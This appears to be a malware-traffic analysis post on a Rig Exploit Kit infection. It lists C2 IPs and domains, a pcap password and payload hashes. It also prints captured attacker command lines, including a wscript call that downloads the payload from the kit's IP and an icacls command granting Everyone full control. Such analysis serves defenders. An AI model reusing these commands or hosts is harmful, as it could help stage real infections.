Rig Exploit Kit drops malware

I have added a zipped pcap file for your analysis. The password for the zipped pcap is infected all lowercase.

PCAP file of the infection traffic:
2019-08-05-RigEK.zip

 

ASSOCIATED DOMAINS:

92.53.127.25 – Rig Exploit Kit
193.242.211.184 – UDP Port 12858 – sebains.kozow.com – C2
185.100.85.198 – UDP Port – 52051 – lightoutlotway.dynu.net – C2

 

INTERESTING PROCESSES:

[Script dropped during exploit to download initial payload]
Image C:\Windows\System32\wscript.exe
CommandLine wsCripT //B //E:JScript T.t “cN9tEL5NN9ka” “http://92.53.127.25/?NTMyNjIz&jPYSLffjnHvsEx&ffhdt3s=wnjQMvXcKxXQFYbJKuXDSK1DKU7WG0aVw4-ehMG3YpfNfynz2OzURnL7tASVVFWRrbMdK-BT&EszEoCTqn=golfer&PAhdhUiQXMHPJA=referred&KxxkOcDn=golfer&BapNWuQHZyd=community&fUtOUbi=heartfelt&bEfKUgShyx=strategy&YhJWhmxiCle=difference&eIcERSWSuWdAQ=strategy&MoIUsQO=heartfelt&NKJpbhmrFqfBKfX=difference&LmnBWNMBrxXq=wrapped&NVuZwo=strategy&DLvZagxyrlAU=wrapped&t4ggf4=OALp3xTRKQxgn40LVAlB9Kmmh0PUmx-VgZGC9RaNaAlCqZPHHLkL3lj1yLUccc0g90vC6mhg&bMmVecKEIwR=everyone&cobLOwQaqAiPrbC=everyone&AXToTKNDA4MjIx” “ยค”
ParentImage C:\Windows\System32\cmd.exe

[Remote System Discovery]
Image C:\Windows\System32\PING.EXE
CommandLine ping -n 2 127.0.0.1
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cmd /c “”C:\Users\Ted\AppData\Local\Temp\jhNV4qr63tUpINV2b2P77gv.bat” ”

[Process Discovery]
Image C:\Windows\System32\tasklist.exe
CommandLine tasklist
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cmd /c “”C:\Users\Ted\AppData\Local\Temp\16z1R6Di24WAR04Y8KGlGNq5v1jc4.bat” ”

[File Permissions Modification]
Image C:\Windows\System32\icacls.exe
CommandLine icacls “C:\ProgramData\Java” /t /c /grant Everyone:(f)
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cmd /c “”C:\Users\Ted\AppData\Local\Temp\Nj4q0o9L4x02Zh9uqnh0.bat” ”

[Network Connection]
Image C:\ProgramData\Java\jre8\bin\jusched.exe
Protocol udp
DestinationIp 185.100.85.198
DestinationPort 52051

[Network Connection]
Image C:\ProgramData\Cy6lLLcgZUeIb.exe
Protocol udp
DestinationIp 193.242.211.184
DestinationPort 12858

 

IMAGES AND DETAILS:


Shown above: Rig Exploit kit landing page. Rik EK caught in loop dropping payload numerous times.

 


Shown above: Command and control (C2) over UDP port 12585

 


Shown above: Command and control (C2) over UDP port 52051

 


Shown above: Malware remaining persistent thru Windows Current-User Run registry key

 

MALICIOUS PAYLOAD ASSOCIATED WITH RIG EK:

radF90AC.tmp.exe – Initial payload
SHA-256:
8de767c10c487307e326a570bc4aa7f2cde91c32f3b39f4866f5dc68c361c40b
VirusTotal Link

uheis03h.exeSecondary payload
SHA-256:
f7247c9a491a1c0bfa30faf37785fae9817658693ea04f220dd5e941fc7f8587
VirusTotal Link